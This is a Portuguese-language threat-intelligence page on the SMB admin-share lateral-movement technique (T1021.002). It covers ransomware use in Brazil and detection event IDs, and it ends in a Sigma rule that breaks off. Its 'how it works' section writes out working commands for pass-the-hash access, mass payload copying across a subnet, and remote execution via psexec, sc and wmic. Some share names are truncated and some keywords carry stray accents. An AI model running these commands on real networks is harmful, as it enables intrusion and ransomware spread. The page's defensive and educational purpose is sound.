# T1021.002 - SMB/Windows Admin Shares
> **Técnica pai:** [[t1021-remote-services|T1021 - Remote Services]]
## Descrição
**T1021.002 - SMB/Windows Admin Shares** é uma subtécnica de [[lateral-movement|Movimentação Lateral]] na qual adversários utilizam credenciais válidas para se propagar entre sistemas Windows por meio dos compartilhamentos administrativos padrão do protocolo SMB (Server Message Block): `ADMIN
(mapeia para `%SystemRoot%`), `C
(raiz do disco C), e `IPC
(canal de comunicação entre processos).
Estes compartilhamentos existem em todo Windows por padrão e são acessíveis a membros do grupo local **Administrators** ou **Domain Admins**. Uma vez que o adversário possua credenciais com esses privilégios - obtidas via [[t1078-valid-accounts|T1078 - Valid Accounts]], dump de hashes NTLM ou [[t1558-steal-or-forge-kerberos-tickets|Pass-the-Hash]] - pode montar remotamente os compartilhamentos, copiar e executar payloads sem instalar software adicional, usando apenas ferramentas nativas do Windows como `net use`, `PsExec`, `sc.exe` e `wmic`.
A combinação de SMB com ferramentas como `PsExec` é uma das formas mais antigas e ainda amplamente utilizadas de execução remota em redes Windows - e continua sendo um dos principais vetores de propagação de [[ransomware]] em redes corporativas.
### Contexto Brasil e LATAM
O Brasil é consistentemente um dos países mais afetados por ransomware na América Latina. Grupos como [[lockbit|LockBit Operators]] e [[qilin|Qilin]] utilizam T1021.002 extensivamente na fase de pré-ransom, mapeando a rede e implantando agentes em dezenas ou centenas de hosts antes de acionar a criptografia simultânea - técnica conhecida como "big game hunting".
Em redes corporativas brasileiras - especialmente no [[financial|setor financeiro]], [[government|governo]] e [[healthcare|saúde]] - a presença de compartilhamentos SMB administrativos abertos internamente é comum e raramente auditada. A coexistência de SMBv1 legado (vulnerável ao [[t1210-exploitation-of-remote-services|EternalBlue]]) com sistemas Windows desatualizados cria superfície de ataque significativa. O ataque [[wannacry|WannaCry]] de 2017, que usou SMB como vetor, impactou hospitais e órgãos públicos no Brasil.
---
## Attack Flow
```mermaid
graph TB
A([Adversário]) --> B[Obtém credenciais<br/>Admin/Domain Admin<br/>T1078 ou Pass-the-Hash]
B --> C{{"T1021.002<br/>SMB Admin Shares"}}:::highlight
C --> D[net use \\\\host\\ADMINlt;br/>monta compartilhamento]
D --> E[Copia payload<br/>para host remoto]
E --> F[PsExec / sc.exe<br/>executa payload remotamente]
F --> G[Host comprometido<br/>Host N+1]
G --> H[Replicação em massa<br/>pré-ransomware deployment]
classDef highlight fill:#e74c3c,color:#fff
```
---
## Como Funciona
**Passo 1 - Obtenção de credenciais e montagem do compartilhamento**
Com credenciais de um conta com privilégios administrativos locais ou de domínio, o adversário monta o compartilhamento administrativo do host-alvo. As credenciais podem ser em texto claro, hashes NTLM (Pass-the-Hash) ou tickets Kerberos:
```cmd
:: Montar compartilhamento com credenciais
net use \\192.168.1.50\ADMIN$ /user:DOMINIO\AdminUser Senha123
:: Verificar compartilhamentos disponíveis no alvo
net view \\192.168.1.50
:: Usando hash NTLM (via ferramentas como Impacket)
python smbexec.py DOMINIO/
[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
```
**Passo 2 - Cópia e implantação do payload**
Com o compartilhamento montado, o adversário copia o payload (ransomware, loader, implante de C2) diretamente para o sistema de arquivos remoto através do mapeamento de disco:
```cmd
:: Copiar payload para o host remoto via ADMIN$
copy beacon.exe \\192.168.1.50\ADMIN$\Temp\
:: Usando xcopy para múltiplos hosts (propagação em massa)
for /L %i in (1,1,254) do copy payload.exe \\192.168.1.%i\C$\Windows\Temp\ 2>nul
```
**Passo 3 - Execução remota e propagação**
Após copiar o payload, o adversário usa `PsExec`, `sc.exe` ou `wmic` para executar o arquivo remotamente. Esta etapa é repetida para cada host da rede em fase de pré-ransom, podendo infectar centenas de sistemas em minutos antes de acionar a criptografia simultânea:
```cmd
:: Execução via PsExec (cria serviço temporário no host remoto)
psexec \\192.168.1.50 -d C:\Windows\Temp\payload.exe
:: Execução via sc.exe (serviço nativo Windows)
sc \\192.168.1.50 creaté SvcName binpath= "C:\Windows\Temp\payload.exe" start= auto
sc \\192.168.1.50 start SvcName
:: Execução via wmic
wmic /node:192.168.1.50 process call creaté "C:\Windows\Temp\payload.exe"
```
---
## Detecção
### Event IDs Relevantes (Windows)
| Event ID | Log | Indicador |
|----------|-----|-----------|
| **4624** | Security | Logon tipo 3 (Network) - acesso remoto via SMB a compartilhamentos administrativos |
| **4648** | Security | Logon com credenciais explícitas - uso de `net use` com usuário/senha |
| **4776** | Security | Validação de credenciais NTLM - autenticações em cadeia para múltiplos hosts |
| **5140** | Security | Acesso a compartilhamento de rede - registra `\\host\ADMIN
, `\\host\C
, `\\host\IPC
|
| **5145** | Security | Verificação de acesso a objeto de compartilhamento - arquivos acessados via SMB |
| **7045** | System | Novo serviço instalado - PsExec cria serviço temporário `PSEXESVC` |
| **4688** | Security | Processo criado com nome `psexesvc.exe` ou processo filho de `services.exe` anômalo |
### Regra Sigma
```yaml
title: Acesso a compartilhamentos administrativos Windows fora do padrão operacional
id: 9c1f4a7e-2d3b-4f8c-a5e0-7b9d2c6f1e4a
status: production
description: >
Detecta acessos a compartilhamentos administrativos (ADMIN$, C$, IPC$) que indicam
movimentação lateral via SMB - especialmente acesso em cadeia a múltiplos hosts em
curto intervalo ou fora do horário administrativo esperado.
references:
- https://attack.mitre.org/techniques/T1021/002
author: RunkIntel
daté: 2026/03/24
tags:
- attack.lateral_movement
- attack.t1021.002
logsource:
product: windows
service: security
detection:
selection:
EventID: 5140
ShareName|endswith:
- '\ADMIN
- '\C